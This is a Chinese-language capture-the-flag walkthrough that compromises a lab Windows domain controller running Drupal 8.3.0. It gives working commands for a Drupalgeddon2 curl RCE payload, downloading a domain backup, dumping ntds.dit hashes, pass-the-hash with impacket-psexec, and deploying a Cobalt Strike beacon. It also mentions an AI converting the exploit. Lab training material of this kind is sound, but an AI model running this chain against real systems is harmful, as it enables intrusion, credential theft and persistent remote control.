XiaoW001靶场通关
靶场信息
系统:Windows Server 2012 R2
中间件:Apache
CMS:Drupal 8.3.0
角色:AD域控制器
二.页面展示
开始渗透
IP地址查看,输入arp-scan -l 获取靶机IP地址
目标是192.168.10.139,接下来进一步的渗透
- 使用nmap进行端口扫描,输入nmap -sV -O 192.168.10.139
很明显,这个机器是AD域控制器+apache中间件的服务器,它开放了80端口,我们可以进一步的访问80端口渗透
3.打开浏览器输入192.168.10.139 查看网页
根据左下角可以看出来这是一个开源的CMS内容管理系统,为了实现漏洞利用,接下来通过Kali的工具获取它的相关信息
4..Kali运行命令whatweb
这是一个Drupal 8的CMS内容管理系统,也就是说可能存在远程代码执行漏洞
5..Kali运行命令:searchsploit Drupal 8
发现Drupal 8版本存在一个RCE远程代码执行,我们获取它的payload
6..Kali运行命令:searchsploit -m 44448
可以看到脚本保存到了kali的家目录,接下来运行payload
7..Kali执行命令 python3 ./44448.py
这里提示输入靶场的url,输入即可
提示不可用不要慌,因为payload是给linux机器写的,我们的可是Windows呀
输入cat ./44448.py
交给ai,让ai转换成为CURL执行代码命令
接下来替换IP和执行命令,通过exec执行有点问题,替换system就正常了
curl -X POST 'http://192.168.10.139/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
-d 'form_id=user_register_form' \
-d '_drupal_ajax=1' \
-d 'mail[#post_render][]=system' \
-d 'mail[#type]=markup' \
-d 'mail[#markup]=dir C:'
可以看出来我执行了dir命令,返回了C盘目录,接下来向域控继续干!
8.尝试访问C盘的www文件夹
发现有一个备份文件,可以进行url拼接下载这个文件
9.Kali执行命令:wget http://192.168.10.139/xiaodomain-bak.zip
解压xiaodomain-bak.zip
是一个域账户备份信息,我们可以通过impackte工具dump它的哈希
10.Kali执行命令:impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
成功获取Administrator的NTLMV2哈希
11.Kali执行:impacket-psexec xiao/administrator@192.168.10.139 -hashes :3c573fe744b7aeb5aca9f4f36761b7d6 -codec gbk
成功获取System权限,接下来玩点好玩的
打开CS打枪工具
执行chmod 777 ./*
执行./teamserver 192.168.10.140 8888
打开cs客户端输入IP地址和8888密码
创建监听器
创建木马
导出后放入kali
Kali执行命令:impacket-psexec xiao/administrator@192.168.10.139 -hashes :3c573fe744b7aeb5aca9f4f36761b7d6 -c ./artifact_x64.exe
太好了,成功上线!